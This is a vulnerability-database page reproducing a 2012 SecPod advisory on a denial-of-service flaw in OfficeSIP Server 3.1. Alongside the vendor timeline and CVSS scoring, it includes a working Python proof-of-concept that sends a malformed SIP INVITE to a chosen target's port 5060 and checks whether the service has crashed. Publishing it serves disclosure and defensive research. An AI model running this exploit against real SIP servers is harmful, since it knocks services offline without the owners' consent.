Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

OfficeSIP Server 3.1 - Denial of Service

🗓️ 02 Feb 2012 00:00:00Reported by SecPod ResearchType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 20 Views

OfficeSIP Server 3.1 Denial of Service vulnerability caused by improper validation of SIP/SIPS URI in the 'To' header of the reques

Code
##############################################################################
#
# Title    : OfficeSIP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
#            http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date     : 01/02/2012
#
###############################################################################

SecPod ID: 1034					22/12/2011 Issue Discovered
						20/01/2012 Reported to Vendor
						No Response
						01/02/2012 Advisory Released

Class: Denial Of Service			Severity: Medium


Overview:
---------
Office SIP Server version 3.1 is prone to a denial of service vulnerability.


Technical Description:
----------------------
The vulnerability is caused due to improper validation of SIP/SIPS URI in the
'To' header of the request, which allows remote attackers to cause denial of
service condition.


Impact:
--------
Successful exploitation could allow an attacker to crash the service.


Affected Software:
------------------
OfficeSIP Server 3.1


Tested on:
-----------
OfficeSIP Server 3.1 on Windows XP SP2 & SP3.
Older versions might be affected.


References:
-----------
http://www.officesip.com
http://secpod.org/blog/?p=461
http://www.officesip.com/download/OfficeSIP-Server-3.1.zip


Proof of Concept:
----------------
http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py


Solution:
----------
Not available


Risk Factor:
-------------
    CVSS Score Report:
        ACCESS_VECTOR          = NETWORK
        ACCESS_COMPLEXITY      = LOW
        AUTHENTICATION         = NOT_REQUIRED
        CONFIDENTIALITY_IMPACT = NONE
        INTEGRITY_IMPACT       = NONE
        AVAILABILITY_IMPACT    = PARTIAL
        EXPLOITABILITY         = PROOF_OF_CONCEPT
        REMEDIATION_LEVEL      = UNAVAILABLE
        REPORT_CONFIDENCE      = CONFIRMED
        CVSS Base Score        = 5 (AV:N/AC:L/Au:N/C:N/I:N/A:P)
        Risk factor            = Medium


Credits:
--------
Prabhu S Angadi of SecPod Technologies has been credited with the discovery of this
vulnerability.

#!/usr/bin/python
##############################################################################
#
# Title    : OfficeSIP Server Denial Of Service Vulnerability
# Author   : Prabhu S Angadi SecPod Technologies (www.secpod.com)
# Vendor   : http://www.officesip.com
# Advisory : http://secpod.org/blog/?p=461
#            http://secpod.org/advisories/SecPod_Exploit_OfficeSIP_Server_DOS_Vuln.txt
#            http://secpod.org/exploits/SecPod_Exploit_OfficeSIP_Server_DOS.py
# Software : OfficeSIP Server 3.1
# Date     : 01/02/2012
#
##############################################################################

import socket,sys,time

port   = 5060
target = raw_input("Enter host/target ip address: ")

if not target:
    print "Host/Target IP Address is not specified"
    sys.exit(1)

print "you entered ", target

try:
    socket.inet_aton(target)
except socket.error:
    print "Invalid IP address found ..."
    sys.exit(1)

try:
    sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
    print "socket() failed service not running"
    sys.exit(1)

#Malicous To SIP URI triggers vulnerability and brings SIP port down
exploit = "INVITE sip:[email protected] SIP/2.0\r\n"+\
          "Via: SIP/2.0/UDP example.com\r\n"+\
          "To: user2 <sip:malicioususer@>\r\n"+\
          "From: user1 <sip:[email protected]>;tag=00\r\n"+\
          "Call-ID: [email protected]\r\n"+\
          "CSeq: 1 INVITE\r\n"+\
          "Contact: <sip:[email protected]>\r\n\r\n"

sock.sendto(exploit, (target, port))
#Server evaluates and takes a while to go down.
time.sleep(40)
sock.close()

#Verify port is down
try:
    sock.connect()
except:
    print "OfficeSIP server port is down."
    print "Service not responding ...."
    sys.exit(1)

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Feb 2012 00:00Current
7High risk
Vulners AI Score7
officesip serverdenial of serviceimproper validationsip/sips uriremote attackexploitationservice crash
20